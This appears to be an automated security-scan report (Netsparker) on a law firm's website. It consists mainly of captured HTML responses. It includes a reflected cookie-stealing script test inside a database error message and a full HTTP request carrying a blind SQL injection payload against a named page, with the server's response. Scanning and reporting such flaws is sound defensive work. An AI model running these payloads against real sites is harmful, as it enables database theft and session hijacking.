<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="navDefault"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../nr">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_self" href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../terms.htm">terms of use</a></font></td>
</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="images/booksTB.jpg"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
<p align="right" style="margin-right: 10"><b>
<font face="Verdana" size="1" color="#FFFFFF">news/resources</font></b></td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
<p class="class2" align="right"></td>
<td width="48%" height="3">
<font face="Verdana" size="1"><a href="alerts.asp">alerts &amp;
newsletters</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="articles.asp">articles</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="press.asp">press
releases</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="publications.asp">publications</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../glossary/glossary.htm">
glossary of VC &amp; IPO terms</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../blog/governmentcontracts/default.asp">blogs</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../podcast/default.htm">podcasts</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Articles</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
<img border="0" src="images/n.jpg" width="46" height="31"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="211">
<tr>
<td width="52%" height="210" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
<tr><td colspan=7 color=#000000 bgcolor=#ffff00><tt><b>Database Results Error</b><br><i>Description:</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 554f0bd0<script>alert(document.cookie)</script>ba5591b9a23)'.<br><i>Number:</i> -2147217900 (0x80040E14)<br><i>Source:</i> Microsoft OLE DB Provider for ODBC Drivers<br></tt></td></tr></tbody>
</table>
<p style="margin-left: 100; margin-right: 5">
<a href="javascript:history.go(-1)"><b>
<font face="Verdana" style="font-size: 8.5pt">� </font></b>
<font face="Verdana" style="font-size: 8.5pt">RETURN TO SEARCH RESULTS</font></a></td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="210" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="210" bgcolor="#FFFFFF">
<p align="center">
<img border="0" src="images/ews_res.jpg" align="right" width="46" height="455"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td>
</tr>
</table>

</td>
<td width="90%" height="590" valign="top">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="228">
<tr>
<td width="100%" height="10" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="33" bgcolor="#C8000A">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="166" bgcolor="#616163">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="19" bgcolor="#4C4C4C">&nbsp;</td>
</tr>
</table>
<p align="right">
&nbsp;</td>
</tr>
</table>

</body>

</html>
Microsoft Access Identified

Microsoft Access Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft Access as backend database. This issue is reported for information purposes only.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /disc/cntcdisclaimer.asp

/disc/cntcdisclaimer.asp CONFIRMED

http://www.brownrudnick.com/disc/cntcdisclaimer.asp?ID=-1%20OR%201=1%20AND%20ASC(MID((CHR(78)%26CHR(..

Request

GET /disc/cntcdisclaimer.asp?ID=-1%20OR%201=1%20AND%20ASC(MID((CHR(78)%26CHR(69)%26CHR(84)%26CHR(83)%26CHR(80)%26CHR(65)%26CHR(82)%26CHR(75)%26CHR(69)%26CHR(82)),5,1))=88%00 HTTP/1.1
Referer: http://www.brownrudnick.com/nr/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:01:57 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12373
Content-Type: text/html
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg" width="758" height="18"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../nr/">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover">
<a href="cntcdisclaimer.asp"><font face="Verdana" size="1">terms of use</font></a></td>

</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="../images/filecabTB.jpg" width="244" height="178"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
</td>
<td width="48%" height="3">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Notice</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="386">
<tr>
<td width="52%" height="385" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<p style="line-height: 105%; margin-left:100px; margin-right:5px">
<font face="Verdana" style="font-size: 9pt">Y</font><font style="font-size: 8.5pt" face="Verdana">ou
understand and agree that transmitting information to Brown
Rudnick&nbsp;by e-mail does not establish an attorney-client
relationship. By clicking the &quot;Agree&quot; link below, you acknowledge
that (i) Brown Rudnick&nbsp;has no obligation to maintain the
confidentiality of any information you submit to Brown
Rudnick&nbsp;unless Brown Rudnick&nbsp;already represents you or Brown
Rudnick&nbsp;later agrees to represent you; thus, if you are not a
client, information you submit to Brown Rudnick&nbsp;by e-mail may be
disclosed to others and (ii) you have read and
understand the Brown Rudnick <a target="_blank" href="../terms.htm">
Terms of Use</a> and
<a target="_blank" href="../privacy.htm">Privacy Policy</a> and that you agree to be bound by
the terms and conditions of such
<a target="_blank" href="../terms.htm">Terms of Use</a> and
<a target="_blank" href="../privacy.htm">Privacy Policy</a>.</font></p>
<p style="line-height: 105%; margin-left:100px; margin-right:5px">
<font face="Verdana" style="font-size: 8.5pt">If you would like to
discuss becoming a client, please contact one of Brown Rudnick's
attorneys to arrange for a meeting or telephone conference. Thank
you for your interest in Brown Rudnick.</font></p>
<font size="2">
<div align="center">
<table id="table2" width="204">
<tbody>
<tr><td colspan=2 align="LEFT" width="100%"></td></tr></tbody>
</table></div>
</font>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber10" height="39">
<tr>
<td width="100%" height="39">
<form method="POST" action="../search/result.asp">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="689" id="AutoNumber12" height="49">
<tr>
<td width="100%" height="22">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
&nbsp;<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font face="Verdana" size="1"><a href="javascript:history.back()">
Previous Page</a></font><font face="Verdana" style="font-size: 8.5pt"><br>
<br>
&nbsp;</font></td>
</tr>
</table>

</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table height="20" cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
</tbody>
</table>
</td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="385" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="385" bgcolor="#FFFFFF">
<p align="center" style="margin-left: 4">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td>
</tr>
</table>

</td>
<td width="90%" height="590" valign="top">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="228">
<tr>
<td width="100%" height="10" bgcolor="#000000"&..